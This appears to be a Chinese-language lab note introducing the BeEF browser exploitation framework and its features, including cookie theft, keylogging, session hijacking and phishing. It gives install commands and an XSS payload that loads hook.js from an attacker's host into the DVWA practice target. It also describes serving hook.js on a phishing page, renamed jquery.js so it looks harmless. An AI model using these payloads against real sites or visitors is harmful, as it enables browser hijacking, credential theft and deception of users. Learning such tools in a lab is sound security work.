BeEF 网页钓鱼平台
BeEF 介绍
- BeEF 全称 The Brower Exploitation FrameWork 是一款针对浏览器的浏览器渗透测试工具,使用Ruby 语言开发的 用于实现对XSS 漏洞的攻击和利用
BeEF 主要是往网页中插入一段名为hook.js 的JS 脚本代码,如果浏览器访问了 有 hook.js(钩子)的页面 就会被 hook(钩住)勾连的浏览器会执行初始代码 返回一些信息 接着目标主机会每隔一段时间 默认为疫苗 就会向BeEF 服务器发送一个请求询问是否有新的代码需要执行
功能介绍
- 信息搜集
- 可以实现网络发现 主机信息获取 cookie获取,会话劫持,获取键盘记录,获取插件信息等功能
- 持久化控制
- 社会工程学攻击:
- 可以实现点击劫持,弹窗警告,虚假页面钓鱼页面等攻击
- 渗透攻击
- 可以实现内网渗透,CSRF跨站请求伪造攻击,DDOS攻击,还可以结合Metasploit 使用
安装和使用
# 安装
apt-get install beef-xss
# 启动
beef-xss # 首次启动需要输入新密码
# 管理界面地址
http://127.0.0.1:3000/ui/panel
# 配置文件
/usr/share/beef-xss/config.yaml
- 启动之后 打开管理地址页面 左侧 为上线的设备 也就是目标的浏览器 右侧是各种功能 比如获取定位 浏览器弹窗等功能 不过需要有设备上线才能显示
- 使用这个有两个方法一个是 在有xss 漏洞的地方将 这个东西插进去获取
- 第二个方法则是 使用嵌入了钩子的钓鱼页面 只要对方打开 这边就可以获取到
- 笔记两种都会记录不过都是局域网下的 使用内网穿透 尝试使用第二种的时候发现 无法使用第一种则是由于没有靶场 并没有进行实战
第一种
- 使用靶场 dvva 找到XSS 漏洞 并把靶场的防御等级设置为低 将以下代码输入到 提交框中即可
<script src="http://<IP>:3000/hook.js></script>"
第二种
- 将攻击代码放到钓鱼网站里
- 打开 apache2 服务器
service apache2 start
- 切换目录到 /var/www/html 输入 以下命令
cd /var/www/html
sudo wget http://127.0.0.1:3000/hook.js -O /var/www/html/jquery.js
# 或者
sudo wget http://192.168.1.11:3000/hook.js -O /var/www/html/jquery.js
- 编辑
/var/www/html/index.html 将以下代码插入进去
<script src='./jquery.js'></script>
- 访问 kali 80端口的 apache 服务器 这个时候会出现 默认的index.html
- 同时打开后台管理页面 就可以看到主机上线了
在左侧的commands 中找到 Create Alert Delog 点击 一下之后点击右侧的excute 即可进行弹窗攻击
